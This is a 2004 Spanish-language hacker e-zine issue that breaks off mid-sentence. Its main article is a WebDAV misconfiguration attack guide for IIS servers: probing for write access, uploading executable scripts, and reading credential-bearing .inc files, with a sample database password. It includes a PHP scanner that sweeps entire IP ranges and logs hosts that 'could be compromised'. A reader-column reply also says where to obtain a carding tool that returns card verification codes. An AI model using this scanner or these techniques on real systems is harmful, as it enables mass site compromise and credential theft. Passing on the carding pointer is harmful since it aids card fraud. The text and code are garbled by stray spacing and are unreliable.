Hoy dejamos antes ustedes, nuestros lectores fieles el trabajo de un amigo y la alianza que se empieza
a gestar con nuestros amigos de Vulnfact, la cual dice referencias con colaboraciones para los dos lados,
tanto para Vulnfact como para CDT y que despus de largas conversaciones damos el primer paso
para que esto fluya y se realice de la mejor forma posible y que nos deje enseanzas a nosotros y a
ellos.

A continuacin, presentamos el texto explicativo sobre Webdav Remote Misconfig Detection y a su ves
se porta una herramienta de deteccin de este propio bug codeada por Rowter, as que disfruten.

#!/usr/bin/php -q
<?
/*
[Webdav Remote *Misconfig* Detection] by Rowter
Author: Rowter ([email protected])

-
What is WebDAV?

Briefly: WebDAV stands for "Web-based Distributed Authoring and Versioning". It is a set of
extensions to the HTTP protocol which allows users to collaboratively edit and manage files on
remote web servers.

-
Tested: Windows 2003 IIS/6.0
Windows NT IIS/5.0

This specific misconfig is real simple, and some times very common on IIS servers with webdav
enabled, letting remote users to actually log anon to webdav and modify any content inside the web,
leading to copromise the whole site.

Detect if the victim is using webd av:

#nc victim.com 80
OPTIONS / HTTP/1.1

HTTP/1.1 200 OK --> OPTIONS method accepted

Server: Microsoft- IIS/6.0 --> Webserver name and Version


Date: Fri, 05 Mar 2004 05:37:10 GMT
MS-Author- Via: MS-FP/4.0,DAV --> Webdav Enable!

Content- Length: 0
Accept- Ranges: none
DASL: <DAV:sql>
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND,
PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH,
SEARCH, MKCOL, LOCK, UNLOCK --> Methods that web server
will Allow anyone to use.

Ok, now we saw that webdav is enabled, lets detect witch is a misconfigured server:

First of ALL:

Windo ws IIS Server configur ati o n s:

-- If ALL flag are OFF:


Allow: OPTIONS, TRACE, GET, HEAD, LOCK, UNLOCK

-- If WRITE(CAUTION) flag ON:


Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, MKCOL, LOCK, UNLOCK

-- If READ flag ON:


Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK

-- If BROWSE flag ON: -> this one is not remotly detected, so we need to
make a list test, I use CADAVER bsd/linux webdav client.

dav:/test/> ls
Listing collection `/test/': succeeded.
else
Listing collection `/test/': collection is empty.
No Allow detection.

-- If READ & WRITE flag ON:


Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH,
SEARCH, MKCOL, LOCK, UNLOCK -> this is the allow we are looking for a vulnerable server.

--If Script Execution flag is ON:

You could literaly upload any file that could executed by the serverlike .asp or .aspx, and run them
Ofcourse >)

else

This are the Outputs if you try to upload with Script Exec OFF.

IIS 6.0
with .net

Uploading test.resources to `/test/test.resources':


Progress: [=============================>] 100.0% of 1635 bytes failed:
404 Not Found
Uploading test.webinfo to `/test/test.webinfo':

Progress: [=============================>] 100.0% of 1635 bytes failed:


404 Not Found
Uploading test.vbproj to `/test/test.vbproj':
Progress: [=============================>] 100.0% of 1635 bytes failed:
404 Not Found
Uploading test.vb to `/test/test.vb':
Progress: [=============================>] 100.0% of 1635 bytes failed:
404 Not Found
Uploading test.stm to `/test/test.stm':
Progress: [=============================>] 100.0% of 1635 bytes failed:
404 Not Found
Uploading test.soap to `/test/test.soap':
Progress: [=============================>] 100.0% of 1758 bytes failed:
403 Forbidden
Uploading test.shtml to `/test/test.shtml':
Progress: [=============================>] 100.0% of 1635 bytes failed:
404 Not Found
Uploading test.shtm to `/test/test.shtm':
Progress: [=============================>] 100.0% of 1635 bytes failed:
404 Not Found
Uploading test.resx to `/test/test.resx':
Progress: [=============================>] 100.0% of 1635 bytes failed:
404 Not Found
Uploading test.rem to `/test/test.rem':
Progress: [=============================>] 100.0% of 1758 bytes failed:
403 Forbidden
Uploading test.licx to `/test/test.licx':
Progress: [=============================>] 100.0% of 1635 bytes failed:
404 Not Found
Uploading test.idc to `/test/test.idc':
Progress: [=============================>] 100.0% of 1635 bytes failed:
404 Not Found
Uploading test.csproj to `/test/test.csproj':
Progress: [=============================>] 100.0% of 1635 bytes failed:
404 Not Found
Uploading test.cs to `/test/test.cs':
Progress: [=============================>] 100.0% of 1635 bytes failed:
404 Not Found
Uploading test.config to `/test/test.config':
Progress: [=============================>] 100.0% of 1635 bytes failed:
404 Not Found
Uploading test.axd to `/test/test.axd':
Progress: [=============================>] 100.0% of 1758 bytes failed:
403 Forbidden
Uploading test.asmx to `/test/test.asmx':
Progress: [=============================>] 100.0% of 1758 bytes failed:
403 Forbidden
Uploading test.ashx to `/test/test.ashx':
Progress: [=============================>] 100.0% of 1758 bytes failed:
403 Forbidden

Uploading test.ascx to `/test/test.ascx':


Progress: [=============================>] 100.0% of 1635 bytes failed:
404 Not Found
Uploading test.asax to `/test/test.asax':
Progress: [=============================>] 100.0% of 1635 bytes failed:

404 Not Found


Uploading test.exe to `/test/test.exe':
Progress: [=============================>] 100.0% of 1635 bytes failed:
404 Not Found
Uploading test.com to `/test/test.com':
Progress: [=============================>] 100.0% of 1635 bytes failed:
404 Not Found
Uploading test.aspx to `/test/test.aspx':
Progress: [=============================>] 100.0% of 1758 bytes failed:
403 Forbidden
Uploading test.cer to `/test/test.cer':
Progress: [=============================>] 100.0% of 1635 bytes failed:
404 Not Found
Uploading test.cdx to `/test/test.cdx':
Progress: [=============================>] 100.0% of 1635 bytes failed:
404 Not Found
Uploading test.asp to `/test/test.asp':
Progress: [=============================>] 100.0% of 1635 bytes failed:
404 Not Found
Uploading test.asa to `/test/test.asa':
Progress: [=============================>] 100.0% of 1635 bytes failed:
404 Not Found

* But you could upload any of this other files like :

Uploading test.amp to `/test/test.amp':


Progress: [=============================>] 100.0% of 10 bytes succeeded.
Uploading test.gif to `/test/test.gif':
Progress: [=============================>] 100.0% of 10 bytes succeeded.
Uploading test.jpg to `/test/test.jpg':
Progress: [=============================>] 100.0% of 10 bytes succeeded.
Uploading test.doc to `/test/test.doc':
Progress: [=============================>] 100.0% of 10 bytes succeeded.
Uploading test.jsp to `/test/test.jsp':
Progress: [=============================>] 100.0% of 10 bytes succeeded.
Uploading test.mp3 to `/test/test.mp3':
Progress: [=============================>] 100.0% of 10 bytes succeeded.
Uploading test.zip to `/test/test.zip':
Progress: [=============================>] 100.0% of 10 bytes succeeded.
Uploading test.bat to `/test/test.bat':
Progress: [=============================>] 100.0% of 10 bytes succeeded.
Uploading test.php to `/test/test.php':
Progress: [=============================>] 100.0% of 10 bytes succeeded.
Uploading test.html to `/test/test.html':
Progress: [=============================>] 100.0% of 10 bytes succeeded.
Uploading test.txt to `/test/test.txt':
Progress: [=============================>] 100.0% of 10 bytes succeeded.
Uploading test.vbdisco to `/test/test.vbdisco':
Progress: [=============================>] 100.0% of 10 bytes succeeded.

Well, now what if there is only a READ flag and a BROWSE flag ON:

You could search for some files like:

*.inc --> usually includes with database passwords

example:

db.inc
<!-- ASP -->
<%

Set Conn = Server.CreateObject("ADODB.Connection")


Conn.open "DSN=nemx;UID=nemx;PWD=789Pass1;DATABASE=nemx"

%>

webdav will give you access to read it, because is not a recognized executable file, like .asp.
Well this txt, was a demostration of how simple things could lead to compromise a whole site, being a
lazy admin and trusting that noone will detect webdav is enable and leaving free access.

-----------------------------------------------------------------------------------------------------------------------
You could make this file exec ut abl e and run the Scan n e r code down here >)
-----------------------------------------------------------------------------------------------------------------------
VulFact Researc h e s.
WebDav Misconfig Issue that leads to compro m i s e the server
Tested : windo w s 2003 IIS/6.0
by Rowt er
ww w.v ul n fa c t.co m
*/
// Turn off all error reportin g
error_reporti n g(0);
functio n logtotxt($s o m e c o n t e n t )
{
$filena m e = 'logvul n s.txt';
$handl e = fopen($file n a m e, 'a');
fwrite($h a n d l e, $some c o n t e n t);
fclose($h a n d l e);
}
functio n webdav($d o m a i n,$s c a n) {
echo "
-----------------------------------------------------------------------------------------------------------------
VF : ww w.v ul nf a c t.c o m : Webdav Remote Misconfig Scan n e r by Rowter
Scan[$sc a n] \ n";
$fp = fsockop e n ($ d o m ai n, 80, $errno, $errstr, 1);
if ($errno == 0){
fputs($fp, "OPTIONS / HTTP/1.0 \ r \ n H o s t: " . $domai n . "\r \ n \ r \ n C o n n e c t i o n:
close \ r \ n \ r \ n");
fflush($fp);
$server = "";

echo "HOST:[$domai n] Checki n g Head ers... \ n";


whil e (!feof($fp)) {
$server .= fgets($fp);
//var_du mp ($s erv e r);
preg_matc h ("%^HTTP/1.[01] \ s *( \ d +) *([^ \ n \ r ]*)(.*?)$%is",$server,$matc h e s );

$resp on s e c o d e = $match e s [1];


$resp on s e = $match e s[2];
$head er s = $match e s[3];
if ($resp o n s e !="OK")
{ echo "$respon s e c o d e $respo n s e \ n";break;}

if (preg_matc h ("/^Server \ s (.*?)/",$head er s,$matc h 1))


{ print_r($matc h 1); }

if (preg_matc h ("/\bAll o w:/",$head er s)==1)


{
if (preg_matc h ("/DAV/",$head er s)==1)
{logtotxt("$domai n: Has Webdav Enabled \ n");}
if (stristr( $head er s,"Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE,
PROPFIN D, PROP PATCH, SEARCH, MKCOL, LOCK, UNLOCK")) {
echo $domai n." Could be Comprom i s e d \ n";
//loging to a file the vuln sites
logtotxt("$domai n: Could be comprom i s e d with web Da v \ n");break;}
else
{ echo "Server Not Vuln. \ n"; break;}}}
flush();
fclose($fp);}
else
{echo "HOST:[$domai n ] Time Out \ n;";}}

if ($argc < 2 | | in_array($arg v[1], array('- -help', '-help', '-h','-?')))


{?>
VF : ww w.v ul nf a c t.c o m : Check remotly if webd av is misconfi g, by Rowt er.
Scan Option s: -s {Startin g from} -a {Class A} 192.0.0.0
-e {Ending at} -b {Class B} 192.168.0.0
-w {Whole Class} -c {Class C} 192.168.2.0
--------------------------------------------------------------------------------------------------
Usage: <?php echo $argv[0];?> {HOST} {ScanFor m} {Class}
Scan in g examp le s:
<?
echo "
$argv[0] www.b0x.co m --> search vuln host only
$argv[0] www.b0x.co m -s -b --> starts on ww w.b0x.co m ip class b
$argv[0] www.b0x.co m -e -b --> ends on www.b0x.co m ip class b
$argv[0] www.b0x.co m -w -b --> scan the whol e class b";
}
else {
//scann e r test

$HOST=geth o s tb y n a m e ($ ar g v[1]);
preg_mat c h ("/^(\ d{1,2} | 1 \ d \ d | 2 [ 0 - 4]\ d | 2 5 [ 0- 5]) \ .( \ d {1,2} | 1 \ d \ d | 2 [ 0 - 4] \ d | 2 5 [ 0- 5]) \ .( \ d {1,2} |
1\ d \ d | 2 [ 0- 4] \ d | 2 5 [ 0- 5]) \.( \ d {1,2} | 1 \ d \ d | 2 [ 0 - 4] \ d | 2 5 [ 0- 5])$/",$HOST,$scan t h i s );
$ip=$scan t h i s [0];
$node=$s c a n t h i s [1];
$A=$scan t h i s [2];
$B=$scant h i s[3];
$C=$scant h i s[4];

if ($ip==0)
{echo "Badly Structu r e d IP, Pleas e Check $argv[3]; \ n";die();}
if ($argv[2]=='')
{webdav($i p,"1");}

if ($argv[2]=='-w')
{
$coun t=0;
//Class C
if ($argv[3]=='-c')
{
for ($strt=0;$strt<=255;$strt++){
//run
$ip="$node.$A.$B.$strt";
$coun t++;
web dav($ip,$co u n t);}
}

//Class B
if ($argv[3]=='-b')
{
$temp B=0;
for ($tempC=0;$tem pC<=255;$tem pC++)
{if ($tempC>=255){$tem pC=0;$tem p B++;}
if($tem p B==255&&$tec m p C=255){Break;}
//run
$ip="$node.$A.$tem p B.$t e m p C";
$coun t++;
web dav($ip,$co u n t);
}}

//Class A
if ($argv[3]=='-a')
{
$temp B=0;
$tempA=0;
for ($tempC=0;$C<=255;$tempC++)
{if ($tempC>=255&&$temp B!=255){$tem pC=0;$tem p B++;}
if($tem p B==255&&$te m p C==255){$tem pA++;$temp C++;$temp B=0;}
if($tem pA==255&&$tem p B==255&&$te m pC==255- 1){Break;}
//run
$ip="$node.$te m pA.$t e m p B.$te m p C";

$coun t++;
web dav($ip,$co u n t);}}

}//end of -w

if ($argv[2]=='-e')
{

//Class C

if ($argv[3]=='-c')
{
for ($strt=0;$strt<=$C;$strt++){
//run
$ip="$node.$A.$B.$strt";
$coun t++;
web dav($ip,$co u n t);}}

//Class B
if ($argv[3]=='-b')
{
$temp B=0;
for ($tempC=0;$tem pC<=255;$tem pC++)
{if ($tempC>=$C){$tem pC=0;$tem p B++;}
if($tem p B==$B&&$tec m pC=$C){Break;}
//run
$ip="$node.$A.$tem p B.$t e m p C";
$coun t++;
web dav($ip,$co u n t);
}}

//Class A
if ($argv[3]=='-a')
{
$temp B=0;
$tempA=0;
for ($tempC=0;$C<=255;$tempC++)
{if ($tempC>=$C+1&&$temp B!=$B){$tem pC=0;$tem p B++;}
if($tem p B==$B&&$tem pC==$C){$tem pA++;$tem pC++;$tem p B=0;}
if($tem pA==$A&&$tem p B==$B&&$tem pC==$C- 1){Break;}
//run
$ip="$node.$te m pA.$t e m p B.$te m p C";
$coun t++;
web dav($ip,$co u n t);
}}

}//end of -e

if ($argv[2]=='-s')
{

//Class C
if ($argv[3]=='-c')
{for (;$C<=255;$C++){
//run
$ip="$node.$A.$B.$C";
$coun t++;
web dav($ip,$co u n t);}}

//Class B
if ($argv[3]=='-b')
{$tempC=$sca n t h i s [4];
for (;$C<=255;$tempC++)
{if ($tempC==255){$tem pC=$C;$B++;}
if($B==255&&$tem pC==254){Break;}
//run
$ip="$node.$A.$B.$te m p C";
$coun t++;
web dav($ip,$co u n t);
}}

//Class A
if ($argv[3]=='-a')
{
$tempC=$scan t h i s [4];
$temp B=$s c a n t h i s[3];
for (;$C<=255;$tempC++)
{if ($tempC>=255&&$temp B!=255){$tem pC=$C;$temp B++;}
if($tem p B==255&&$te m p C==255){$A++;$tempC=$C;$tem p B=$B;}
if($A==255&&$temp B==255&&$tem pC==254){Break;}
//run
$ip="$node.$A.$tem p B.$t e m p C";
$coun t++;
web dav($ip,$co u n t);
}}

}//end of -s

}
?>
Pasea n d o por los proyectos CDT
Por: Editor CDT
Mail de contact o: [email protected]

Primero que nada parto diciendo, que tenamos un poco en la duerma como se dice los proyectos,
aunque algunos seguan activos, como es el caso de las charlas en irc, el lab de nuevas tecnologas, etc
por falta de tiempo que en este tiempo hemos tenido, casi la mayora de los integrantes de CDT ya que
como es sabido, casi todos estudiamos en la universidad, algunos trabajan o hacen las dosas a la vez.
Esto nos ha ido quitando tiempo, como saben llego marzo todo hay que organizar para el ao que se
viene, pero no tampoco por eso dejaremos botados nuestros proyectos, muy por el contrario, en la
venida de estos meses los vamos a reactivar con todas las fuerzas.
Empezaremos a poner uno a uno en funcionamiento otra ves nuestros proyectos, ya tenemos las
comisiones listadas para cada uno y dentro de los meses de abril a mayo ya tendremos nuestro sitio
web en funcionamiento y es ah tambin donde daremos a conocer cada uno de los frutos de la mayora
de los ya citados proyectos CDT.
Por ahora podemos decir que se nos aun sumado dos nuevos proyectos, los cuales daremos a conocer
con su debido orden de tiempo. Siendo el mas importante el congreso llamado Por una cultura digital
el cual se llevara a cavo los meses de octubre de este ao y en el cual se tratar a la seguridad
informtica orientada a los tiempos de hoy en todo su esplendor.
La presentacin de dicho congreso aun no tiene fecha definida, pero se sabe a ciencia sierta que sera en
el mes de octubre y sera en la ciudad de Santiago de Chile, a l concurrirn diversos personajes del
mundo de la seguridad informtica y as tambin diversos individuos de grupos de seguridad y hackers
tanto internacionales como nacionales.
Bueno para mayor informacin les dejo con el texto de presentacin de dicho congreso.

Octubre 2004
Este primer congreso pionero en actividades y magnitud, ser orientado a la seguridad en redes y
sistemas informticos, as tambin, a expandir y dar a conocer la cultura hacktivista, a las personas y
empresas, el impacto social y los estigmas de la gente al toparse con la palabra hacker. Dar conocer
que hacker no es sinnimo de ladrn o bandido ciberntico, por el contrario, es de una persona
entusiasta luchando por vencer obstculos y trabajar con las tecnologas, entre muchas cosas ms.
En este primer congreso a gran escala, se tratar n diversos aspectos de la seguridad informtica y
temas del mundo de los expertos en seguridad y hackers, tanto nacionales como internacionales.
Trataremos a fondo dichos temas y el mundo de hoy, la importancia de las tecnologas seguras, los
sistemas operativos robustos, la programacin en entornos seguros, las redes en entornos seguros,
protocolos de comunicacin, etc. Exposiciones y talleres de expertos en este campo, as tambin
hackers reconocidos tanto dentro y/o fuera de su pas, formarn parte de este congreso y llegan a este
rincn del mundo con el solo fin de propagar la cultura de la seguridad y temticas orientadas al
mundo de hoy, a la importancia de mantener las redes seguras, los peligros a los que estn expuestos
nuestros datos en Internet, la propagacin del cdigo libre y sistemas tales como Unix, Linux, BSD,
etc.
Dejamos las puertas abiertas a la comunidad, publico en general, empresas, expertos en seguridad,
profesores informticos, tcnicos, estudiantes y el sin fin de gente interesada, a comunicarse con
nosotros a los correos que salen en su apartado, as tambin a posibles expositores que quieran estar
presentes en este evento.
Temti c a s a realizars e en el congres o.
1.- Charlas:
Expositores confirmados hasta el momento:
Nick: nahual
Nacionalidad: Mexicano
Tema a exponer Worms en unix y backdoors avanzados
Institucin: Uno de los creadores del g-con (Congreso de seguridad mexicano)
Descripcin: Profesional de la informtica con aos de experiencia en temas de seguridad

Nick k2
Nacionalidad: Estadounidense
Tema a exponer: Seguridad en redes wireless
Institucin: @Stake
Descripcin: Experto en seguridad informtica
Como el congreso se realizara por tres das, tendremos una cantidad aun no definida de expositores
que dictaran charlas y sern repartidos en diferentes das. Los horarios de las charlas sern desde las 3
de la tarde a las 6 de la tarde (horario modificable segn visin y extensin de los temas a tratar).
La duracin aproximadamente ser de 45 minutos a una hora, con break de 10 minutos como mximo
al culminar las charlas para responder a preguntas y dudas con respecto al tema dictado.

2.- Tallere s:
Despus de realizar las jornadas de charlas daremos pasos a los talleres, los cuales empezaran a las
6:30 o 7:00 de la tarde, cada taller tendr una duracin aproximada de una hora y 10 o 15 minutos
para responder preguntas, inquietudes, etc.
Trataremos diversos temas que estn siendo analizados por la comisin organizadora, tales como:
Kernel panic
Programacin segura
Ingeniera inversa
Seguridad en entornos Unix/Linux
Creacin, propagacin, infeccin y deteccin de gusanos informticos
Seguridad y proteccin en entornos de servidores
Entre otros ms que se estn analizando.

3.- NightP ar ty:


Se realizaran las party, fueron organizadas para distender el ambiente, conocerse mas, charlar acerca
de variados temas y si a esto tambin le agregamos desafos, como por ej. la captura de banderas,
demostraciones y otro tipo de cosas, ser el espacio ideal para compartir tanto con los grupos de
seguridad asistentes, expositores, y formar lazos de amistad, para as tambin quien sabe si llegar a
acuerdos sobre otros posibles congresos, proyectos, etc. Tanto dentro, como fuera del pas.
4.- Requi s it o s de expos ici o n e s:
Nombre completo del expositor
Tema a exponer
Mail de contacto
Pas de residencia
Empresa o institucin
Material o trabajo explicativo sobre el tema, en formato, TXT, PDF o HTML, con imgenes, grficos o
algo fuera de letras. Dicho trabajo debe ser preparado responsablemente y entregado con meses de
anticipacin a la fecha del congreso.
Toda esta informacin, envese a las direcciones del apartado Correos.
5.- Correos:
[email protected], sir- [email protected], [email protected]
Con lo que dice referencia al congreso, este ira sufriendo modificaciones acorde distintas
circunstancias y al tiempo.
A si tambin ya estaremos implementado en nuestro sitio web, dentro de estos meses que se vienen, la
base de datos pertinente para las inscripciones y mayor informacin, por ahora la pueden ver en foro
powers. - http:// foro.powers.cl - Seccin seguridad -
Esto es lo que dice referencia al proyecto mas grande en CDT y al cual le dictaremos todo el tiempo y
responsabilidad para que esto resulte lo mejor posible.
Recordar que las reglas y la definicin de los proyectos los encuentra en la edicin CDT01 en la seccin
llamada Los proyectos CDT.
Charlas CDT
Designado para llevar a cabo este proyecto [EL_CoNaN], atencin lectores, los fines de semanas en el
canal publico de CDT (server irc.cl canal #cdt) se dictaran charlas, con todo lo correspondiente a
seguridad, programacin, redes, electrnica, ingeniera inversa, etc.
Laboratorio Unix/Linux
Designado para llevar a cabo este proyecto es _AlphaIce_ .
Este proyecto esta a puertas de ser lanzado, como explicamos en nuestras ediciones pasadas, este
proyecto en particular se dar a conocer mediante boletines e informes que sern portados a nuestro
sitio web. As que dentro de ya los prximos meses empezaran a ver los frutos.
Hacemos un llamado explicito a la comunidad que lucha por el sofware libre, tanto en chile como en el
extranjero, a que se acerquen a nosotros y as ayudarnos a llevar esto a cabo, ya que siempre las
puertas estn abiertas y la disposicin de acoger gente, ms aun en este tipo de proyectos.
Laboratorio de nuevas tecnologas informticas
Designados para llevar a cabo este proyecto son bitburner, darko y LeOn177.
Con referencia a este proyecto ya se han empezado a mover los hilos de la conduccin y ya se tienen
algunos textos que estn siendo analizados y que ya saben, con la web sern levantados.
Laboratorio viril
Este es uno de los proyectos que aun no hemos designado gente, ya que tenamos designado a nuestro
buen amigo jtag, el cual sufri algunos problemas y hemos perdido comunicacin con el, pero ya pronto
estaremos designando a las personas encargadas de este proyecto.

Bueno estos son los encargados de los diferentes proyectos CDT y como ya han de saber, sus mail estn
adjuntados en sus textos de produccin en esta E-Zine y en las anteriores, para mayor informacin lo
pueden hacer comunicndose a los mails de los encargados y al mail de CDT.
La columna del lector
Por: CDT Stuff
Mail de contact o: [email protected]

Bueno ac como ya hemos hecho costumbre, van los mails que nos llegan al correo moment neo de
CDT, en el cual nos plantean ideas, sugerencias, preguntas, etc, Las que a travs de este apartado,
intentamos dar una repuesta lgica y concisa del punto al cual ustedes quieren llegar. Como es de
costumbre y sabido, no se responden mails del tipo como hackeo Hotmail, como le entro al servidor de
mi empresa, saben que esos mails son redireccionados a /dev/null xDD. Bueno sin ms que decir ac
vamos.
============================================================================
De: nato rojas <[email protected]>
Enviado el: February 13, 2004 2:17:53 AM
Para: [email protected]
Asunto: tcl cvv
Tengo algunas preguntas sobre logmayo18.txt me gustaria saver si me puede ayudar con los tcl para
eggdrops
Necesito saver su nick para saver si a ud al ke le devo poner la pregunta
EL_CoNaN, arknet o bitburner, cual de los 3 gracias por su tiempo
Muchas gracias por su tiempo e comenzado a leer casi todos los articulos de su sitio
me gustaria saver si me puede decir a donde puedo bajar el progama al cual tu le davas una order mas
el cc y te dava los cvv.
y sobres los cursos o algo asi ke vi en su sitio me gustaria saver si es solo para la gente situada en chile
o en cualkier lugar del mundo yo estoy en canada
Gracias por su tiempo
============================================================================
Responde [EL_CoNaN]:
Bueno por lo que veo, ests interesado en lo que es el carding, eso me lo das entender por tu primera
pregunta, te puedo responder que esto en muchos casos es ilegal y en contra de la ley, en Chile, es
penado por la ley informtica, as que primero te aconsejo que leas las leyes y artculos estipulados ah.
Es cosa de cada uno incurrir en ilcitos o no, as que de eso no puedo decir mucho.
Estabas preguntando por el tcl para eggdrops, al que se le pasa la orden de la tarjeta de crdito y te da
el cdigo de verificacin, bueno ese cdigo lo puedes encontrar en astalavista.com.
Sobre la segunda pregunta, lo del los cursos en realidad no son tal como tu los llamas, si no que son
charlas, que dictamos en el servidor publico de CDT (IRC.CL / #CDT), estas charlas son abiertas a todo
tipo de gente, tanto chilena como extranjera, y de libre acceso.
Bueno para mayor info te puedes poner en contacto con nosotros.
-----------------------------------------------------------------------------------------------------------------------------------------------
De: JAVIER HERNANDEZ RODRIGUEZ <[email protected]>
19 december 2003 2:43:19
Para: [email protected]
Asunto: hola
hola, siento las molestias y me imagino que ye fundiran a correos como este, pero es que estoy
empezando a usar el netcat y me interesa mucho. Tengo una gran pregunta, y solo te voy a ser una
para no agobiar, quiero abrirle puertos un pc, entonces pongo Cms line: -l -v ( ip del ordenador) -p
(puerto que quiero abrir) apreto enter y me pone
(ip del ordenador que quiero abrir los puertos) inverse host lookup failed: h_errno 11004:
NO_DATA listening on [any] ( puerto que quiero abrir). . . . .
y se me keda asi, y no se realmente que es lo k me esta haciendo, y lo que quiere decir el mensaje ese
de inverse host lookup failed: h_errno 11004: NO_DATA
y se podrias ayudar te lo agradeceria mucho

---- Responde LeOn177:


Haber vamos hacerlo corto, para abrir un puerto en una maquina (local) lo que debes hacer es nc -l -p
(puerto) donde (puerto), es el que debes elejir a abrir, seguramente el problema que tienes con el error
que te tira, es porque pusiste la flag -v (verbose) y as, intentas hacer un inverse host lookup, para
convertir la ip a un hostname, o el error puede ser por que estas intenta ndo abrir un puerto en una
maquina remota (victima) sin que esta tenga instalado el netcat.
Espero que esto te aclare tu duda, cualquier cosa, envas mail al correo ya sealado.
-----------------------------------------------------------------------------------------------------------------------------------------------
De: Marina Gabriela Perez Paredes <[email protected]>
November 03, 2003 2:45:15 AM
Para: [email protected]
Asunto: Hola!!
Hola!!
Bueno la charla fue programada esos dias cuando los parciales se acercan y la hora no la entiendo yo
veo HEET.....aunque los temas estaban interesantes.

---- Responde [EL_CoNaN]:


Bueno esto dice referencias a las charlas que realizamos en irc.cl canal #cdt. Marina aqu las fechas son
cambiante, las horas tambin, pero cuando preparamos una charla la damos a conocer con
anticipacin, en diferentes medios, tales como foros de seguridad, web, etc. y todo publico (como ya dije)
puede participar de ellas.
-----------------------------------------------------------------------------------------------------------------------------------------------
De: Rodrigo <[email protected]>
27 october 2003 14:57:03
Para: <[email protected]>
Asunto: hola buenos dias !!!
Buenos dias , quisiera saber donde seran impartidas las charlas que has mencionadas en el foro , que
grupos asistiran y lugar fisico de la reunion, valor dle abono etc si es k existe gracias de antemano , a
nosotros tb nos gustaria particcipar.

---- Responde [EL_CoNaN]:


Ya dejamos bien en claro con las respuestas anteriores esto mismo, esta abierto para todos y por lo
dems no se cobra un peso. Se realizan en el canal #cdt server irc.cl
-----------------------------------------------------------------------------------------------------------------------------------------------
Bueno estos son los mail coherentes que llegaron a al correo, llegaron una infinidad de otro tipo, como
los que mostr al comienzo de la leccin, Como puedo hacer para espiar a alguien, como hackeo una
cuenta de Hotmail (este es el tpico xDD), Cuanto cobran por hacer algn tipo de espionaje (este tipo
estaba loco). Cosa que saben que este tipo de mail no llega a encontrar respuesta, al menos ac, y
bueno muchos mas, pero como siempre optamos por la coherencia de los mail, que ac todos ellos sern
respondidos.
Un saludo cordial a nuestros lectores y nos vemos en otra oportunidad.
Noticias del mundo under chile y el mundo
Por LeOn177
Mail de contact o: [email protected]

Ac estamos para darle la ultima informacin del under e informtica en el mundo, as que reljense y
lean el informe que preparamos para que puedan estar al tanto de lo que sucede en estos lados de la
informtica.

Falla en encont r ad a en GnuPG


Cliente de GnuPG (gpg) 1.2.2 y versiones anteriores, dejan en total libertad a intrusos para realizar un
denial of service y a su vez ejecutar cdigo arbitrario. Es as que esta falla tiene un nivel ALTO por que
se puede perder valiosa informacin, y lo puede ejecutar cualquier persona remotamente.
Como dije anteriormente las versiones afectadas son:
1.2.1 - 1.2 - 1.2.2 - rc1.2.2 - rc1.2.3 - 1.3.3

Microsoft por fin ofrece algo gratis: 2 seminarios de seguridad


Como ven Microzoft y el to Bill estn preparando seminarios para los das 5 y 12 de febrero, a los
cuales cualquier persona podr anotarse para participar del evento llamado Security Day Technet.
Las demostraciones que harn (ni decir que son para los sistemas Windows), mostrar n el uso de
herramientas de gestin de parches de seguridad para mantener seguros los sistemas.
Algunos de los secuaces del to Bill que expondrn son: Claudio Vacalebre, que trata ra el tema Gestin
de Parches de Seguridad en entornos Microsoft, y otro personaje: Carlos Lacuna, mostrar a la seguridad
en su propia red corporativa en entornos Wireless y accesos remotos con Smart Card seguros.

Deface masi vo a la nasa


Como ya sabemos nadie se salva de estar en la mira de los hackers o crackers, esta ocasin y una vez
mas, fueron 30 sitios de la NASA los que estuvieron en la mira de un grupo Brasilero que a cada uno de
los sitios penetrados le hicieron un defaced poniendo esta frase:
`The war in iraq, kill is a play
Segn algunas fuentes, los crackers Brasileros se aprovecharon de unos mdulos de apache no
deshabilitados y agregando script PHP habran ganado acceso root.

Banda anch a se mete cada ves mas en los hogare s Chilen o s


Ya estamos a principios del 2004 y Chile se esta metiendo de lleno en lo que tiene que ver a las
tecnologas de alta velocidad (ADSL), en el 2003 se pudo apreciar una subida de usuarios, ms
precisamente un 68%.
A su vez los informes indican que un 37% de la gente, tiene en sus hogares computadoras y cuentan
con conexin de alta velocidad.
Tambin para este ao esperan una gran subida de clientes y bajada en los precios de las conexiones,
espero que sea cierto, as que vamos Chile para arriba y mirar hacia el futuro.

Grande s espect ati v a s para tux en el 2004


Ya hace tiempo Linux esta mostrando que puede pelearle al to Bill, pero lo que se esta viendo es que
mas y mas se mete en distintos lugares del mundo, esta vez est avanzando en Brasil donde varias
entidades han optado por usar el sistema operativo linux por su gran ventaja de no pagar licencia y
dems, desde cybers hasta algunas escuelas, tomaron la opcin de instalarlo y ensear a sus alumnos y
personan a utilizar los ordenadores con linux.
El creador de linux, habl sobre algunas predicciones que tiene respecto al ao que entra en una
entrevista de ComputerWorld Australia, dijo entre otras cosas que dicho sistema repunta r como
sistema operativo para computadoras de casa.
Como sabrn, este sistema operativo ya tiene un fuerte uso en sistemas seguros, su buena
programacin y a la ves buen funcionamiento, seguridad, etc. etc., ahora entrar a n fuerte en el mundo
de las computadoras de uso cotidiano, con cosas mas desarrolladas como el gestor de ventanas Blue
Curve de Red Hat Linux (una mezcla de GNOME y KDE), tambin con el desarrollo del kernel linux,
mas juegos y herramientas de trabajo para oficina prometen acercar al pingino, a aquellos que aun no
lo conocen.
Tolvards dice que ser ms difcil entrar en este mercado para casa, pero pensando en las muchas
herramientas que se han venido desarrollando, podramos llegar a computadoras con Linux Inside de
fbrica, y al real uso de linux como plataforma hogarea.
Linus Torvalds: "Linux conquistar el escritorio del PC en el 2004" Tendr razn?, por lo que se esta
dando en el mundo de los ordenadores creo que se puede decir SI.

Pederas t a, caist e ahora te jodes


Un juez Britnico tomo la decisin de encarcelar a un pederasta que fue acusado de acostarse con una
